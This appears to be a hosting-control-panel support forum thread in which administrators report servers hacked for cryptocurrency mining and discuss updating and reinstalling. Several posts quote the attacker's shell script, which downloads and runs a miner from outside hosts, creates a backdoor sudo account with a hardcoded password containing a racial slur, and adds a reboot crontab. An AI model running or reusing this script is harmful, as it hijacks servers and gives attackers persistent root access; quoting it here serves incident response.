have been HACKED ! by xaxaxa.eu

[ScIT]

A new line was added to /etc/passwd :

Code: Select all

sysroot:x:1007:1008::/home/sysroot:/bin/sh

And /etc/group :

Code: Select all

sysroot:x:1008:

and /etc/gshadow :

Code: Select all

sysroot:!::

and /etc/subuid :

Code: Select all

and /etc/shadow :

Code: Select all

sysroot:$6$A7jC1gBu$3kMVa4OoMDiyw8zLX7Y9X7kmyUNH9cbR6x6tSeNATJ.NlXEBE/DdFnKFCryHJAxHFOIFkUQmyKodtHLJH.QF.:17708:0:99999:7:::

/etc/sudoers (sic!!) :

Code: Select all

sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL

Like thread owner has informed in his first post, the following script was executed:

Code: Select all

if pgrep -x "gcc" > /dev/null
then
    echo "Running"
else
    cd;
    pkill -f xmrig;
    wget -O /tmp/gcc http://xaxaxa.eu/gcc;
    chmod +x gcc;
    wget -O /tmp/config_1.json http://xaxaxa.eu/config_1.json;
    /tmp/gcc -c /tmp/config_1.json;
    echo "fucktheniggers" | sudo -S useradd sysroot;
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
    (crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
    /usr/local/vesta/bin/v-update-sys-vesta-all;
fi

This would explain your created lines.

[aximus]

I've updated the system without errors. But still i'm on version .20. /usr/local/vesta/bin doesn't seem to update anything for me, nor does apt-get update vesta. Any ideas?

[ScIT]

I've updated the system without errors. But still i'm on version .20. /usr/local/vesta/bin doesn't seem to update anything for me, nor does apt-get update vesta. Any ideas?

did you tried to upgrade like i wrote? -> viewtopic.php?f=10&t=17183#p71558

If yes, please share the output of ./v-list-sys-vesta-updates.

[Spheerys]

If yes, please share the output of ./v-list-sys-vesta-updates.

In my case :

Code: Select all

PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  22   amd64  yes   2018-06-26
vesta-php    0.9.8  21   amd64  yes   2018-05-25
vesta-nginx  0.9.8  21   amd64  yes   2018-05-25

[ScIT]

If yes, please share the output of ./v-list-sys-vesta-updates.

In my case :

Code: Select all

PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  22   amd64  yes   2018-06-26
vesta-php    0.9.8  21   amd64  yes   2018-05-25
vesta-nginx  0.9.8  21   amd64  yes   2018-05-25

you're up to date, good so far. now you need to clean your server - my point of view: Do not trust a infected server anymore. Better install a new one and migrate the users there.

[Spheerys]

yes you are right.
Thanks !

[pksh71]

Dear team,

We have around 120+ Servers running in Various DATA CENTERS across the world . out of these 110 Server have vestacp Installed. All the 110 Servers with vestacp installed is hacked for cpu concurrency mining by some unknown hacker.

hacker Installed xmrig minig software on our servers.

some servers also have a script called 'gcc' installed.
how can we get rid of this issue.

Regards

[jonny1960]

also was hacked tonight by mining virus

if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
rm -rf /tmp/gcc;
rm -rf /tmp/config_1.json;
wget -O /tmp/gcc http://bigbatman.loan/gcc;
chmod 777 /tmp/gcc;
wget -O /tmp/config_1.json http://bigbatman.loan/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
echo "fucktheniggers" | sudo -S useradd sysroot;
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
(crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
/usr/local/vesta/bin/v-update-sys-vesta-all;
fi

[aximus]

did you tried to upgrade like i wrote? -> viewtopic.php?f=10&t=17183#p71558

If yes, please share the output of ./v-list-sys-vesta-updates.

I did exactly as you wrote.

Code: Select all

PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  20   amd64  no    2018-04-09
vesta-php    0.9.8  19   amd64  no    2018-01-23
vesta-nginx  0.9.8  20   amd64  no    2018-04-09

I don't mean to hijack the topic. But if I'm not receiving updates then of course my server will be targeted.

[ScIT]

Dear team,

We have around 120+ Servers running in Various DATA CENTERS across the world . out of these 110 Server have vestacp Installed. All the 110 Servers with vestacp installed is hacked for cpu concurrency mining by some unknown hacker.

hacker Installed xmrig minig software on our servers.

some servers also have a script called 'gcc' installed.
how can we get rid of this issue.

Regards

1. Update to actual patch level (0.9.8-22), this will fix the security issue but does .
2. In my point of view: Don't trust infected servers, so reinstall them. If you don't want to reinstall try to clear the system.